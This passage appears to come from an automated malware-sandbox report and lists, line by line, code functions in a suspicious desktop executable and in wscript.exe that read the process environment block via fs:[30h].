Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A4AAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A4AAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A6FAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A6D294 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A6D294 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A62AE4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A62ACB mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A74A2C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A74A2C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A48A0A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A35210 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A35210 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A35210 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A35210 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A3AA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A3AA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A53A1C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00AEB260 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00AEB260 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00B08A62 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A7927A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A39240 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A39240 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A39240 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A39240 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00AFEA55 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00AC4257 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A64BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A64BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A64BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00B05BA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00AF138A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A41B8F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A41B8F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00AED380 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A62397 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A6B390 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A603E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A603E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A603E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A603E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A603E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A603E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A5DBE9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00AB53CA mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00AB53CA mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00AF131B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A3DB60 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A63B7A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A63B7A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A3DB40 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00B08B58 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A3F358 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A4849B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00AF14FB mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00AB6CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00AB6CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00AB6CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00B08CD6 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A6BC2C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00AB6C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00AB6C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00AB6C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00AB6C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00AF1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00AF1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00AF1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00AF1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00AF1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00AF1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00AF1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00AF1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00AF1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00AF1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00AF1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00AF1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00AF1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00AF1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00B0740D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00B0740D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00B0740D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A5746D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A6A44B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00ACC450 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00ACC450 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A635A1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A61DB5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A61DB5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A61DB5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00B005AC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00B005AC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A62581 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A62581 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A62581 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A62581 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A32D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A32D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A32D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A32D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A32D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A6FD9B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A6FD9B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A4D5E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A4D5E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00AFFDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00AFFDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00AFFDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00AFFDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00AE8DF1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00AB6DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00AB6DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00AB6DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00AB6DC9 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00AB6DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00AB6DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00B08D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A43D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A43D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A43D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A43D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A43D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A43D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A43D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A43D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A43D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A43D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A43D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A43D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A43D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A3AD30 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00AFE539 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00ABA537 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A64D3B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A64D3B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A64D3B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A5C577 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A5C577 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A73D43 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00AB3540 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A57D50 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00AB46A7 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00B00EA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00B00EA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00B00EA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00ACFE87 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A616E0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A476E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A78EC7 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00B08ED6 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A636CC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00AEFEC0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A3E620 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00AEFE3F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A3C600 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A3C600 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A3C600 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A68E00 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00AF1608 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A6A61C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A6A61C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A4766D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A5AE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A5AE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A5AE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A5AE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A5AE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A47E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A47E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A47E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A47E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A47E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A47E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00AFAE44 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00AFAE44 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A48794 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00AB7794 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00AB7794 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00AB7794 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A737F5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A620A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A620A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A620A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A620A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A620A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A620A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A790AF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A6F0BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A6F0BF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A6F0BF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A39080 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04AB3884 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04AB3884 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A4849B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A358EC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04AF14FB mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04AB6CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04AB6CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04AB6CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04B08CD6 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04ACB8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04ACB8D0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04ACB8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04ACB8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04ACB8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04ACB8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A6BC2C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A6002D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A6002D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A6002D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A6002D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A6002D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A4B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A4B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A4B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A4B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04AB6C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04AB6C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04AB6C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04AB6C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04B04015 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04B04015 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04AF1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04AF1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04AF1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04AF1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04AF1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04AF1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04AF1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04AF1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04AF1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04AF1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04AF1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04AF1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04AF1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04AF1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04AB7016 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04AB7016 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04AB7016 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04B0740D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04B0740D mov eax, dword ptr fs:[00000030h]
